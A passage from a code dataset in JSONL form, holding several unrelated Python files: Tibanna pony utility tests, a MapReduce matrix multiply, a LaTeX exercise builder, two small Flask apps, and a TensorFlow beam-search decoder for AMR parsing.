pf.__dict__ == proc_file_in_webdev\n assert type(pf) is ProcessedFileMetadata\n ff.was_called_once()\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_format_extension_map(run_awsem_event_data):\n tibanna_settings = run_awsem_event_data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=run_awsem_event_data.get('ff_keys'),\n settings=tibanna_settings)\n\n fe_map = FormatExtensionMap(tibanna.ff_keys)\n assert(fe_map)\n assert 'pairs' in fe_map.fe_dict.keys()\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_merge_source_experiment(run_awsem_event_data):\n input_file = {\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs\",\n \"uuid\": [\"d2c897ec-bdb2-47ce-b1b1-845daccaa571\", \"d2c897ec-bdb2-47ce-b1b1-845daccaa571\"],\n \"object_key\": [\"4DNFI25JXLLI.pairs.gz\", \"4DNFI25JXLLI.pairs.gz\"]\n }\n data = run_awsem_event_data\n tibanna_settings = data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=data.get('ff_keys'),\n settings=tibanna_settings)\n res = merge_source_experiments(input_file['uuid'], tibanna.ff_keys, tibanna.env)\n printlog(res)\n assert 'fake_source_experiment' in res\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_get_extra_file_key(run_awsem_event_data):\n tibanna_settings = run_awsem_event_data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=run_awsem_event_data.get('ff_keys'),\n settings=tibanna_settings)\n fe_map = FormatExtensionMap(tibanna.ff_keys)\n infile_key = 'hahaha/lalala.bedGraph.gz'\n infile_format = 'bg'\n extra_file_format = 'bw'\n extra_file_key = get_extra_file_key(infile_format, infile_key, extra_file_format, fe_map)\n assert extra_file_key == 'hahaha/lalala.bw'\n\n\ndef test_powerup_add_awsem_error_to_output(ff_metadata):\n res = awsem_error_fun(ff_metadata, None)\n assert ('error' in res)\n\n\ndef test_create_ffmeta_input_files_from_pony_input_file_list():\n input_file_list = [{\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs1\",\n \"uuid\": 
[['a', 'b'], ['c', 'd']],\n \"object_key\": [['e', 'f'], ['g', 'h']]\n },\n {\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs2\",\n \"uuid\": [\"d2c897ec-bdb2-47ce-b1b1-845daccaa571\", \"d2c897ec-bdb2-47ce-b1b1-845daccaa571\"],\n \"object_key\": [\"4DNFI25JXLLI.pairs.gz\", \"4DNFI25JXLLI.pairs.gz\"]\n }\n ]\n res = create_ffmeta_input_files_from_pony_input_file_list(input_file_list)\n assert len(res) == 6\n assert 'dimension' in res[0]\n assert res[0]['dimension'] == '0-0'\n assert 'dimension' in res[1]\n assert res[1]['dimension'] == '0-1'\n assert res[1]['ordinal'] == 2\n assert 'dimension' in res[4]\n assert res[4]['dimension'] == '0'\n","sub_path":"tests/core/pony/test_pony_utils.py","file_name":"test_pony_utils.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"499487103","text":"\"\"\"\nMatrix multiplication\n\"\"\"\nimport sys\nfrom itertools import groupby\n\nimport MapReduce\n\nmr = MapReduce.MapReduce()\n\ndef mapper(record):\n \"\"\"Mapper for matrix multiplication\"\"\"\n matrix, i, j, value = record\n if matrix == 'a':\n for ab_j in range(0, 5):\n mr.emit_intermediate((i, ab_j), (matrix, j, value))\n elif matrix == 'b':\n for ab_i in range(0, 5):\n mr.emit_intermediate((ab_i, j), (matrix, i, value))\n else:\n raise RuntimeError('Unexpected matrix {}'.format(matrix))\n\ndef reducer(ij, values):\n \"\"\"Reducer for unique trims\"\"\"\n j_keyfunc = lambda val: val[1]\n sorted_values = sorted(values, key=j_keyfunc)\n row_sum = 0\n for i, col in groupby(sorted_values, j_keyfunc):\n column = list(col)\n if len(column) == 2:\n row_sum += column[0][2] * column[1][2]\n mr.emit((ij[0], ij[1], row_sum))\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as input_data:\n mr.execute(input_data, mapper, reducer)\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575760415","text":"# -*- coding: utf-8 -*-\nfrom get_exo import get_exo_2\nimport os\nf = open('start.tex','r')\nexo=f.read()+get_exo_2(150)+\"\\\\end{document}\"\nf.close()\nwith open('a.tex', 'w') as f:\n f.write(exo)\nf.close()\nos.system(\"pdflatex a.tex\")","sub_path":"testpdf.py","file_name":"testpdf.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"170362541","text":"#Joseph Lee and Jesse \"Mcree\" Chen\n#SoftDev1 pd1\n#K24 -- A RESTful Journey Skyward\n#2019-11-13\nfrom flask import Flask, render_template, request, redirect, url_for\nimport json\nfrom urllib.request import urlopen\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n print(app)\n team = urlopen(\"https://www.balldontlie.io/api/v1/teams/3\")\n json_desc = team.read();\n team_desc = json.loads(json_desc);\n return render_template('home.html',\n team_desc = team_desc\n )\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","sub_path":"25_restrio/2_nba/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340960047","text":"from flask_cors import CORS\nfrom flask import Blueprint, request, jsonify\n\n\nfrom ...models.autograder.seating_layout import SeatingLayout\n\n\nseating_layout_api_bp = 
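The MapReduce matrix-multiply mapper in the record above hardcodes 5x5 result dimensions in both `range(0, 5)` fan-outs. For general sparse A (n x m) and B (m x p), the bounds are p columns for A's entries and n rows for B's; a parameterised sketch, with the factory name hypothetical:

```python
# A[i,j] contributes to every C[i,col]; B[i,j] to every C[row,j].
def make_mapper(mr, n, p):
    def mapper(record):
        matrix, i, j, value = record
        if matrix == 'a':
            for col in range(p):
                mr.emit_intermediate((i, col), (matrix, j, value))
        elif matrix == 'b':
            for row in range(n):
                mr.emit_intermediate((row, j), (matrix, i, value))
        else:
            raise RuntimeError('Unexpected matrix %s' % matrix)
    return mapper
```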
Blueprint('seating_layout_api', __name__)\nCORS(seating_layout_api_bp, supports_credentials=True)\n\n\n@seating_layout_api_bp.route('/add', methods=['POST'])\ndef add():\n '''\n Route used to create a new seating layout in the DB. Only accepts\n POST requests.\\n\n The `seats` field and the `count` field do not have to be present in the\n body of the POST request.\n @author james-c-lars\n '''\n location = request.json.get('location')\n seats = request.json.get('seats', None)\n count = request.json.get('count', None)\n\n status, layout = SeatingLayout.create_layout(location, seats, count)\n\n # If a layout at that location already existed\n if not status:\n return jsonify({'reason': 'location already exists'}), 300\n\n return jsonify({'reason': 'layout created'}), 200\n\n\n@seating_layout_api_bp.route('/update', methods=['PUT'])\ndef update():\n '''\n Route used to update an existing seating layout in the DB. Only accepts\n PUT requests.\\n\n The `seats` field and the `count` field do not have to be present in the\n body of the PUT request.\n @author james-c-lars\n '''\n location = request.json.get('location')\n seats = request.json.get('seats', None)\n count = request.json.get('count', None)\n\n layout = SeatingLayout.find_by_location(location)\n\n # If a layout at that location was not found\n if not layout:\n return jsonify({'reason': \"layout doesn't exist\"}), 300\n\n layout.seats = seats\n layout.count = count\n layout.save()\n\n return jsonify({'reason': 'layout updated'}), 200\n\n\n@seating_layout_api_bp.route('/get', methods=['GET'])\ndef get():\n '''\n Route used to get a particular layout. Either location or layout_id can be\n provided. If both are given, location is prioritized in the search.\n @author james-c-lars\n '''\n layout_id = request.args.get('layout_id', None, type=int)\n location = request.args.get('location', None, type=str)\n\n layout = SeatingLayout.find_by_location(location)\n\n if not layout:\n layout = SeatingLayout.find_by_id(layout_id)\n\n # If a layout at that location was not found\n if not layout:\n return jsonify({'reason': \"layout doesn't exist\"}), 300\n\n return jsonify({'reason': 'request OK', 'result': layout.to_json()}), 200\n\n\n@seating_layout_api_bp.route('/get_all', methods=['GET'])\ndef get_all():\n '''\n Route used to get all layouts stored in the database.\n @author james-c-lars\n '''\n layouts = [layout.to_json() for layout in SeatingLayout.get_all_layouts()]\n\n return jsonify({'reason': 'request OK', 'result': layouts}), 200\n","sub_path":"project/src/api/autograder/seating_layout.py","file_name":"seating_layout.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"192996393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport argparse\nimport os\nimport numpy as np\nfrom oracle.cacheConfiguration import CacheConfiguration\nfrom oracle.cacheTransition import CacheTransition\nfrom postprocessing.amr_format import get_amr\nimport oracle.utils\nimport oracle.ioutil\n\nfrom vocab_utils import Vocab\nimport namespace_utils\nimport soft_NP2P_data_stream\nfrom soft_NP2P_model_graph import ModelGraph\n\nimport re\n\nimport tensorflow as tf\nimport soft_NP2P_trainer\ntf.logging.set_verbosity(tf.logging.ERROR) # DEBUG, INFO, WARN, ERROR, and FATAL\n\ndef search(sess, model, vocab, batch, options, decode_mode='greedy'):\n assert False, 'not in use'\n '''\n for greedy search, multinomial search\n '''\n # Run the encoder to get the 
encoder hidden states and decoder initial state\n (phrase_representations, initial_state, encoder_features,phrase_idx, phrase_mask) = model.run_encoder(sess, batch, options)\n # phrase_representations: [batch_size, passage_len, encode_dim]\n # initial_state: a tupel of [batch_size, gen_dim]\n # encoder_features: [batch_size, passage_len, attention_vec_size]\n # phrase_idx: [batch_size, passage_len]\n # phrase_mask: [batch_size, passage_len]\n\n word_t = batch.gen_input_words[:,0]\n state_t = initial_state\n context_t = np.zeros([batch.batch_size, model.encode_dim])\n coverage_t = np.zeros((batch.batch_size, phrase_representations.shape[1]))\n generator_output_idx = [] # store phrase index prediction\n text_results = []\n generator_input_idx = [word_t] # store word index\n for i in xrange(options.max_answer_len):\n if decode_mode == \"pointwise\": word_t = batch.gen_input_words[:,i]\n feed_dict = {}\n feed_dict[model.init_decoder_state] = state_t\n feed_dict[model.context_t_1] = context_t\n feed_dict[model.coverage_t_1] = coverage_t\n feed_dict[model.word_t] = word_t\n\n feed_dict[model.phrase_representations] = phrase_representations\n feed_dict[model.encoder_features] = encoder_features\n feed_dict[model.phrase_idx] = phrase_idx\n feed_dict[model.phrase_mask] = phrase_mask\n if options.with_phrase_projection:\n feed_dict[model.max_phrase_size] = batch.max_phrase_size\n if options.add_first_word_prob_for_phrase:\n feed_dict[model.in_passage_words] = batch.sent1_word\n feed_dict[model.phrase_starts] = batch.phrase_starts\n\n\n\n if decode_mode in [\"greedy\",\"pointwise\"]:\n prediction = model.greedy_prediction\n elif decode_mode == \"multinomial\":\n prediction = model.multinomial_prediction\n\n (state_t, context_t, coverage_t, prediction) = sess.run([model.state_t, model.context_t,\n model.coverage_t, prediction], feed_dict)\n # convert prediction to word ids\n generator_output_idx.append(prediction)\n prediction = np.reshape(prediction, [prediction.size, 1])\n [cur_words, cur_word_idx] = batch.map_phrase_idx_to_text(prediction) # [batch_size, 1]\n cur_word_idx = np.array(cur_word_idx)\n cur_word_idx = np.reshape(cur_word_idx, [cur_word_idx.size])\n word_t = cur_word_idx\n cur_words = flatten_words(cur_words)\n text_results.append(cur_words)\n generator_input_idx.append(cur_word_idx)\n\n generator_input_idx = generator_input_idx[:-1] # remove the last word to shift one position to the right\n generator_output_idx = np.stack(generator_output_idx, axis=1) # [batch_size, max_len]\n generator_input_idx = np.stack(generator_input_idx, axis=1) # [batch_size, max_len]\n\n prediction_lengths = [] # [batch_size]\n sentences = [] # [batch_size]\n for i in xrange(batch.batch_size):\n words = []\n for j in xrange(options.max_answer_len):\n cur_phrase = text_results[j][i]\n# cur_phrase = cur_batch_text[j]\n words.append(cur_phrase)\n if cur_phrase == \"\": break# filter out based on end symbol\n prediction_lengths.append(len(words))\n cur_sent = \" \".join(words)\n sentences.append(cur_sent)\n\n return (sentences, prediction_lengths, generator_input_idx, generator_output_idx)\n\ndef flatten_words(cur_words):\n all_words = []\n for i in xrange(len(cur_words)):\n all_words.append(cur_words[i][0])\n return all_words\n\nclass Hypothesis(object):\n def __init__(self, actions, log_ps, state, context_input, context_concept, cache_config=None):\n\n self.actions = actions # store all actions\n self.log_probs = log_ps # store log_probs for each time-step\n\n self.state = state\n self.context_input = 
context_input\n self.context_concept = context_concept\n\n # TODO xiaochang\n self.trans_state = cache_config\n self.word_focus = 0\n self.concept_focus = 0\n\n self.cache_idx = 0\n\n def addAction(self, action):\n self.actions.append(action)\n\n def actionSeqStr(self, action_vocab):\n return \"#\".join([action_vocab.getWord(action_id) for action_id in self.actions])\n\n def extend(self, system, action_id, log_prob, state, context_input, context_concept, action_vocab):\n action = action_vocab.getWord(action_id)\n if not system.canApply(self.trans_state, action, self.concept_focus, True, self.cache_idx):\n return None\n\n cache_size = self.trans_state.cache_size\n new_config = CacheConfiguration(cache_size, -1,\n self.trans_state) # Initialize from another config\n next_cache_idx = self.cache_idx\n new_focus = self.concept_focus\n if new_config.phase == oracle.utils.FeatureType.SHIFTPOP:\n if action == \"SHIFT\": # Process the next concept.\n assert self.concept_focus == self.trans_state.hypothesis.nextConceptIDX()\n curr_concept = new_config.getConcept(self.concept_focus)\n oracle_action = \"conID:\" + curr_concept\n if new_config.isUnalign(self.concept_focus):\n oracle_action = \"conGen:\" + curr_concept\n next_cache_idx = cache_size - 2\n else:\n assert action == \"POP\"\n oracle_action = action\n system.apply(new_config, oracle_action)\n elif new_config.phase == oracle.utils.FeatureType.PUSHIDX:\n assert action_vocab.getWord(self.actions[-1]) == \"SHIFT\"\n assert next_cache_idx == cache_size - 2\n system.apply(new_config, action)\n elif new_config.phase == oracle.utils.FeatureType.ARCBINARY:\n if action == \"NOARC\": # No arc made to current cache index\n # next_cache_idx += 1\n if next_cache_idx == 0: # Already the last cache index\n next_cache_idx = 0.5\n new_config.phase = oracle.utils.FeatureType.SHIFTPOP\n new_focus += 1\n else:\n next_cache_idx -= 1\n # if next_cache_idx == cache_size - 1: # Have processed all vertices.\n # next_cache_idx = 0\n # new_config.phase = oracle.utils.FeatureType.SHIFTPOP\n # new_focus += 1\n else: # Then process the label\n assert action == \"ARC\"\n new_config.phase = oracle.utils.FeatureType.ARCCONNECT\n else:\n assert new_config.phase == oracle.utils.FeatureType.ARCCONNECT\n oracle_action = \"ARC%d:%s\" % (next_cache_idx, action)\n system.apply(new_config, oracle_action)\n # next_cache_idx += 1\n # if next_cache_idx == cache_size - 1:\n if next_cache_idx == 0:\n next_cache_idx = 0.5\n assert new_config.phase == oracle.utils.FeatureType.SHIFTPOP\n new_focus += 1\n else:\n next_cache_idx -= 1\n\n new_actions = self.actions + [action_id]\n new_probs = self.log_probs + [log_prob]\n new_hyp = Hypothesis(new_actions, new_probs, state, context_input, context_concept, new_config)\n if new_config.phase == oracle.utils.FeatureType.SHIFTPOP:\n new_hyp.word_focus = new_config.nextBufferElem()\n if new_hyp.word_focus == -1: # Either POP or after PUSHIDX.\n new_hyp.word_focus = len(self.trans_state.wordSeq)\n else: # ARC or PUSHIDX\n new_hyp.word_focus = self.word_focus # The word focus does not change during arc or pushidx.\n new_hyp.cache_idx = next_cache_idx\n new_hyp.concept_focus = new_focus\n return new_hyp\n\n def readOffUnalignWords(self):\n concept_align = self.trans_state.conceptAlign\n\n # If all concepts are read, should also move word pointer to the last.\n if self.concept_focus >= len(concept_align):\n self.trans_state.clearBuffer()\n self.word_focus = len(self.trans_state.wordSeq)\n return\n\n length = len(self.trans_state.wordSeq)\n while 
(self.word_focus not in self.trans_state.widTocid) and self.word_focus < length: # Some words are unaligned.\n popped = self.trans_state.popBuffer()\n assert popped == self.word_focus\n self.word_focus += 1\n\n def extractFeatures(self):\n # At first step, decide whether to shift or pop.\n word_idx, concept_idx = self.word_focus, self.concept_focus\n if (self.trans_state.phase == oracle.utils.FeatureType.ARCBINARY or self.trans_state.phase\n == oracle.utils.FeatureType.ARCCONNECT):\n assert self.actions, \"Empty action sequence start without shift or pop\"\n assert self.cache_idx != -1, \"Cache related operation without cache index.\"\n word_idx, concept_idx = self.trans_state.rightmostCache()\n return self.trans_state.extractFeatures(self.trans_state.phase, word_idx, concept_idx, self.cache_idx)\n\n def isFinal(self):\n return\n\n def latest_action(self):\n return self.actions[-1]\n\n def avg_log_prob(self):\n return np.sum(self.log_probs[1:])/ (len(self.actions)-1)\n\n def probs2string(self):\n out_string = \"\"\n for prob in self.log_probs:\n out_string += \" %.4f\" % prob\n return out_string.strip()\n\n def amr_string(self):\n pass\n # TODO xiaochang, make a string that represents an AMR from self.trans_state\n\n\ndef sort_hyps(hyps):\n return sorted(hyps, key=lambda h: h.avg_log_prob(), reverse=True)\n\n\ndef run_beam_search(sess, trans_system, model, feat_vocab, action_vocab, batch, cache_size, options):\n # Run encoder\n # TODO: this is inconsistent with the paramters returned by run_encoder?\n (initial_state, input_hiddens, input_features, input_mask,\n concept_hiddens, concept_features, concept_mask) = model.run_encoder(sess, batch, options)\n\n sent_stop_id = action_vocab.getIndex('')\n # Initialize this first hypothesis\n context_input_init = np.zeros([model.input_hidden_dim])\n context_concept_init = np.zeros([model.concept_hidden_dim])\n\n # Initialize decode\n sent_anno = batch.instances[0][0]\n concept_seq = sent_anno.concepts\n concept_align = batch.instances[0][2]\n sent_length = sent_anno.length\n concept_num = len(concept_seq)\n concept_categories = sent_anno.categories\n assert len(concept_align) == concept_num, \"%s %s\" % (str(concept_seq), str(concept_align))\n initial_config = CacheConfiguration(cache_size, sent_length)\n\n # all these attributes should be shared by all hypothesis\n initial_config.wordSeq, initial_config.lemSeq, initial_config.posSeq = sent_anno.tok, sent_anno.lemma, sent_anno.pos\n initial_config.conceptSeq, initial_config.conceptAlign = concept_seq, concept_align\n initial_config.categorySeq = concept_categories\n initial_config.tree = sent_anno.tree\n initial_config.buildWordToConcept()\n print (sent_anno.tok)\n print (concept_seq)\n print (concept_categories)\n\n assert sent_anno.tree is not None\n\n start_action_id = batch.action_inp[0][0]\n initial_actionseq = [start_action_id]\n initial_hypo = Hypothesis(initial_actionseq, [0.0], initial_state, context_input_init,\n context_concept_init, initial_config)\n hyps = [initial_hypo]\n\n # beam search decoding\n results = [] # this will contain finished hypotheses (those that have emitted the action)\n steps = 0\n # print (\"maximum action seq length: %d\" % options.max_answer_len)\n # while steps < options.max_answer_len and len(results) < options.beam_size:\n options.max_answer_len = 4000\n while steps < options.max_answer_len and len(results) < options.beam_size:\n cur_size = len(hyps) # current number of hypothesis in the beam\n\n cur_input_hiddens = np.tile(input_hiddens, (cur_size, 1, 1)) # 
[batch_size, passage_len, enc_hidden_dim]\n cur_input_features = np.tile(input_features, (cur_size, 1, 1)) # [batch_size, passage_len, options.attention_vec_size]\n cur_input_mask = np.tile(input_mask, (cur_size, 1)) # [batch_size, passage_len]\n\n cur_concept_hiddens = np.tile(concept_hiddens, (cur_size, 1, 1))\n cur_concept_features = np.tile(concept_features, (cur_size, 1, 1)) # [batch_size, passage_len, options.attention_vec_size]\n cur_concept_mask = np.tile(concept_mask, (cur_size, 1)) # [batch_size, passage_len]\n\n cur_state_t_1 = [] # [2, gen_steps]\n\n cur_context_input_t_1 = [] # [batch_size, input_hidden_dim]\n cur_context_concept_t_1 = [] # [batch_size, concept_hidden_len]\n cur_action_t = [] # [batch_size]\n\n cur_action_feats = [] # [batch, feat_num]\n feat_reprs = []\n for h in hyps:\n if h.trans_state.phase == oracle.utils.FeatureType.SHIFTPOP:\n h.readOffUnalignWords() # First ignore all unaligned words.\n\n feats = h.extractFeatures()\n feat_reprs.append(\"#\".join(feats))\n # print (\"Features extracted: %s\" % \"#\".join(feats))\n feat_idxs = feat_vocab.to_index_sequence_for_list(feats)\n cur_action_feats.append(feat_idxs)\n\n cur_state_t_1.append(h.state)\n cur_context_input_t_1.append(h.context_input)\n cur_context_concept_t_1.append(h.context_concept)\n cur_action_t.append(h.latest_action())\n\n cur_context_input_t_1 = np.stack(cur_context_input_t_1, axis=0)\n cur_context_concept_t_1 = np.stack(cur_context_concept_t_1, axis=0)\n cur_action_t = np.array(cur_action_t, dtype='int32')\n cur_action_feats = np.array(cur_action_feats, dtype='int32')\n\n cells = [state.c for state in cur_state_t_1]\n hidds = [state.h for state in cur_state_t_1]\n new_c = np.concatenate(cells, axis=0)\n new_h = np.concatenate(hidds, axis=0)\n new_dec_init_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)\n\n feed_dict = {}\n feed_dict[model.init_decoder_state] = new_dec_init_state\n feed_dict[model.context_input_t_1] = cur_context_input_t_1\n feed_dict[model.context_concept_t_1] = cur_context_concept_t_1\n feed_dict[model.actionidx_t] = cur_action_t\n\n # TODO: extract configuration features and map them to feature indices.\n feed_dict[model.featidx_t] = cur_action_feats\n\n feed_dict[model.input_hiddens] = cur_input_hiddens\n feed_dict[model.input_features] = cur_input_features\n feed_dict[model.input_mask] = cur_input_mask\n\n feed_dict[model.concept_hiddens] = cur_concept_hiddens\n feed_dict[model.concept_features] = cur_concept_features\n feed_dict[model.concept_mask] = cur_concept_mask\n\n (state_t, context_input_t, context_concept_t, topk_log_probs, topk_ids) = sess.run([model.state_t,\n model.context_input_t, model.context_concept_t, model.topk_log_probs, model.topk_ids], feed_dict)\n\n new_states = [tf.nn.rnn_cell.LSTMStateTuple(state_t.c[i:i+1, :], state_t.h[i:i+1, :]) for i in xrange(cur_size)]\n\n\n # Extend each hypothesis and collect them all in all_hyps\n all_hyps = []\n for i in xrange(cur_size):\n h = hyps[i]\n cur_state = new_states[i]\n cur_context_input = context_input_t[i]\n cur_context_concept = context_concept_t[i]\n # TODO xiaochang, do filtering\n for j in xrange(options.topk_size):\n cur_action_id = topk_ids[i, j]\n # cur_action = action_vocab.getWord(cur_action_id)\n cur_action_log_prob = topk_log_probs[i, j]\n\n new_hyp = h.extend(trans_system, cur_action_id, cur_action_log_prob, cur_state,\n cur_context_input, cur_context_concept, action_vocab)\n if new_hyp:\n all_hyps.append(new_hyp)\n\n if len(all_hyps) == 0:\n print (\"No hypothesis found at step %d\" % 
steps)\n break\n\n # Filter and collect any hypotheses that have produced the end action.\n # hyps will contain hypotheses for the next step\n hyps = []\n for h in sort_hyps(all_hyps):\n # If this hypothesis is sufficiently long, put in results. Otherwise discard.\n if h.latest_action() == sent_stop_id or trans_system.isTerminal(h.trans_state):\n if steps >= options.min_answer_len:\n results.append(h)\n # hasn't reached stop action, so continue to extend this hypothesis\n else:\n hyps.append(h)\n if len(hyps) == options.beam_size or len(results) == options.beam_size:\n break\n\n if len(hyps) == 0:\n break\n\n steps += 1\n # print (\"number of results: %d at step %d\" % (len(results), steps))\n\n # At this point, either we've got beam_size results, or we've reached maximum decoder steps\n # if we don't have any complete results, add all current hypotheses (incomplete summaries) to results\n if len(results)==0:\n results = hyps\n # else:\n # # Print out all the target hypothesis.\n # for (k, h) in enumerate(results):\n # if k == 0:\n # curr_repr = \"result %d, action seq: %s\" % (k, h.actionSeqStr(action_vocab))\n # print (curr_repr)\n # print (h.trans_state.toString())\n\n # Sort hypotheses by average log probability\n hyps_sorted = sort_hyps(results)\n\n # Return the hypothesis with highest average log prob\n return hyps_sorted\n\ndef generateAMR(hypo, sent_anno):\n concept_line_reprs = hypo.trans_state.toConll()\n category_map = sent_anno.map_info\n return get_amr(concept_line_reprs, category_map)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_prefix', type=str, required=True, help='Prefix to the models.')\n parser.add_argument('--in_path', type=str, required=True, help='The path to the test file.')\n parser.add_argument('--out_path', type=str, help='The path to the output file.')\n parser.add_argument('--cache_size', type=int, help='Cache size for the cache transition system.')\n parser.add_argument(\"--decode\", action=\"store_true\", help=\"if to decode new sentences.\")\n parser.add_argument('--mode', type=str,default='pointwise', help='The path to the output file.')\n\n args, unparsed = parser.parse_known_args()\n\n model_prefix = args.model_prefix\n in_path = args.in_path\n out_path = args.out_path\n mode = args.mode\n cache_size = args.cache_size\n use_dep = args.decode\n\n print(\"CUDA_VISIBLE_DEVICES \" + os.environ['CUDA_VISIBLE_DEVICES'])\n\n # load the configuration file\n print('Loading configurations from ' + model_prefix + \".config.json\")\n FLAGS = namespace_utils.load_namespace(model_prefix + \".config.json\")\n FLAGS = soft_NP2P_trainer.enrich_options(FLAGS)\n\n # load vocabs\n print('Loading vocabs.')\n word_vocab = char_vocab = POS_vocab = NER_vocab = None\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n print('word_vocab: {}'.format(word_vocab.word_vecs.shape))\n if FLAGS.with_char:\n char_vocab = Vocab(model_prefix + \".char_vocab\", fileformat='txt2')\n print('char_vocab: {}'.format(char_vocab.word_vecs.shape))\n if FLAGS.with_POS:\n POS_vocab = Vocab(model_prefix + \".POS_vocab\", fileformat='txt2')\n print('POS_vocab: {}'.format(POS_vocab.word_vecs.shape))\n action_vocab = Vocab(model_prefix + \".action_vocab\", fileformat='txt2')\n print('action_vocab: {}'.format(action_vocab.word_vecs.shape))\n feat_vocab = Vocab(model_prefix + \".feat_vocab\", fileformat='txt2')\n print('feat_vocab: {}'.format(feat_vocab.word_vecs.shape))\n\n print('Loading test set.')\n if use_dep:\n testset = 
soft_NP2P_data_stream.read_Testset(in_path)\n elif FLAGS.infile_format == 'fof':\n testset = soft_NP2P_data_stream.read_generation_datasets_from_fof(in_path, isLower=FLAGS.isLower)\n else:\n testset = soft_NP2P_data_stream.read_all_GenerationDatasets(in_path, isLower=FLAGS.isLower)\n print('Number of samples: {}'.format(len(testset)))\n\n print('Build DataStream ... ')\n batch_size=1\n if mode in ['beam_search', 'beam_evaluate']: batch_size = 1\n assert batch_size == 1\n\n devDataStream = soft_NP2P_data_stream.DataStream(testset,\n word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab, feat_vocab=feat_vocab, action_vocab=action_vocab,\n options=FLAGS, isShuffle=False, isLoop=False, isSort=True, batch_size=batch_size, decode=True)\n print('Number of instances in testDataStream: {}'.format(devDataStream.get_num_instance()))\n print('Number of batches in testDataStream: {}'.format(devDataStream.get_num_batch()))\n\n best_path = model_prefix + \".best.model\"\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-0.01, 0.01)\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=False, initializer=initializer):\n valid_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n feat_vocab=feat_vocab, action_vocab=action_vocab, options=FLAGS, mode=\"decode\")\n\n ## remove word _embedding\n vars_ = {}\n for var in tf.all_variables():\n if \"word_embedding\" in var.name: continue\n if not var.name.startswith(\"Model\"): continue\n vars_[var.name.split(\":\")[0]] = var\n saver = tf.train.Saver(vars_)\n\n initializer = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(initializer)\n\n saver.restore(sess, best_path) # restore the model\n\n system = CacheTransition(cache_size, oracle.utils.OracleType.CL)\n if use_dep:\n shiftpop, pushidx, arcbinary, arclabel = soft_NP2P_data_stream.load_actions(in_path)\n system.shiftpop_action_set, system.push_action_set = shiftpop, pushidx\n system.arcbinary_action_set, system.arclabel_action_set = arcbinary, arclabel\n income_arc_choices, outgo_arc_choices, default_arc_choices = soft_NP2P_data_stream.load_arc_choices(in_path)\n system.income_arcChoices, system.outgo_arcChoices = income_arc_choices, outgo_arc_choices\n system.default_arcChoices = default_arc_choices\n\n total = 0\n correct = 0\n outfile = open(out_path, 'wt')\n devDataStream.reset()\n for i in range(devDataStream.get_num_batch()):\n # if i < 349:\n # continue\n cur_batch = devDataStream.get_batch(i)\n print('Instance {}'.format(i))\n\n hyps = run_beam_search(sess, system, valid_graph, feat_vocab, action_vocab, cur_batch, cache_size, FLAGS)\n outfile.write(\"# tok:: \" + cur_batch.instances[0][0].tokText.encode('utf-8') + \"\\n\")\n outfile.write(\"# sentence-{}\".format(cur_batch.instances[0][0].idx) + \"\\n\")\n for j in xrange(len(hyps)):\n hyp = hyps[j]\n cur_result = ' '.join([action_vocab.getWord(x) for x in hyp.actions])\n outfile.write(\"# Hyp-{}:: \".format(j) + cur_result + \"\\n\")\n output_amr = generateAMR(hyp, cur_batch.instances[0][0])\n outfile.write(output_amr.to_amr_string().encode('utf-8') + \"\\n\")\n if j == 0:\n curr_repr = \"result %d, action seq: %s\" % (j, hyp.actionSeqStr(action_vocab))\n print (curr_repr)\n # print (hyp.trans_state.toString())\n print (output_amr.to_amr_string().encode('utf-8') + \"\\n\")\n break\n outfile.write(\"\\n\")\n outfile.flush()\n 
